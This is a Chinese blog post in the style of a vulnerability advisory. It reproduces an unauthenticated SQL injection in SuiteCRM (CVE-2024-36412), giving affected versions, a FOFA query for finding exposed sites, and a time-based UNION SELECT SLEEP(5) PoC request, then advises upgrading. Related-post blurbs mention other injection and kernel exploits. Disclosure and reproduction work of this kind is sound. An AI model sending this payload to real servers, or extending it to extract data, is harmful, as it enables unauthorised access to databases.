SuiteCRM SQL注入漏洞复现(CVE-2024-36412)

已于 2024-07-14 10:43:49 修改
阅读量38 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-07-14 10:43:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140413469
版权

0x01 产品简介

SuiteCRM是一款屡获殊荣的企业级开源客户关系管理系统,它具有强大的功能和高度的可定制性,且完全免费。

0x02 漏洞概述

SuiteCRM存在SQL注入漏洞,未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句,从而获取数据库敏感信息。

0x03 影响范围

SuiteCRM < 7.14.4

SuiteCRM < 8.6.1

0x04 复现环境

FOFA:title="SuiteCRM"

0x05 漏洞复现

PoC

GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

延时5秒

0x06 修复建议 

目前官方已发布漏洞修复版本,建议用户升级到安全版本

https://suitecrm.com/

0xSecl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】WordPress Automatic SQL注入漏洞(CVE-2024-27956)
qq_67810151的博客
05-07 322
WordPress Automatic Plugin 小于 3.92.0 的版本存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
Mura CMS processAsyncObject SQL注入漏洞复现(CVE-2024-32640)
0xSec
05-10 767
2024年5月8日,互联网上披露其存在CVE-2024-32640 MuraCMS processAsyncObject SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞 构造恶意请求获取数据库中的敏感信息,深入利用可写入后门文件可造成远程代码执行获取服务器权限。
sql注入漏洞CVE-2022-32991)
热门推荐
Battery的博客
09-10 8万+
CVE-2022-32991是Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。打开靶场环境,如下。
WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)
0xSec
05-05 652
WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026、CVE-2024-21793)
0xSec
05-10 899
当启用 LDAP时,BIG-IP Next Central Manager 版本20.0.1 - 20.1.0的API (URI) 中存在OData 注入漏洞,该漏洞存在于Central Manager 处理 OData 查询的方式中,可能导致未经身份验证的威胁者注入OData 查询过滤器参数,从而获取敏感信息,如管理员密码哈希等。
WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)
0xSec
05-01 972
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。
CRMEB开源电商系统 /api/products SQL注入漏洞复现(CVE-2024-36837)
0xSec
06-17 966
2024年6月,CRMEB开源电商系统发布了新补丁,修复了一处SQL注入漏洞CVE-2024-36837)。经分析,该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单,建议受影响的用户尽快修复漏洞
XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)
0xSec
02-15 1152
XMall 开源商城 /item/list、/item/listSearch、/sys/log、/order/list、/member/list 、/member/list/remove等多处接口存在SQL注入漏洞,未经身份验证的攻击者可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
WebLogic Server JNDI注入漏洞复现(CVE-2024-20931)
0xSec
02-23 1832
在Oracle发布的2024年1月补丁中,成功修复了一个基于Weblogic T3\IIOP协议的远程命令执行漏洞CVE-2024-20931,该漏洞是由于 CVE-2023-21839 漏洞未修补完全,未经身份验证的攻击者通过 T3、IIOP进行网络访问来破坏 Oracle WebLogic Server。成功利用此漏洞可能会导致 Oracle WebLogic Server 被接管。
蓝网科技临床浏览系统 deleteStudy SQL注入漏洞复现(CVE-2024-4257)
0xSec
04-29 986
蓝网科技临床浏览系统 deleteStudy接口处SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1094
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 584
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1102
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
最新发布
tigerman20201的博客
07-13 167
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值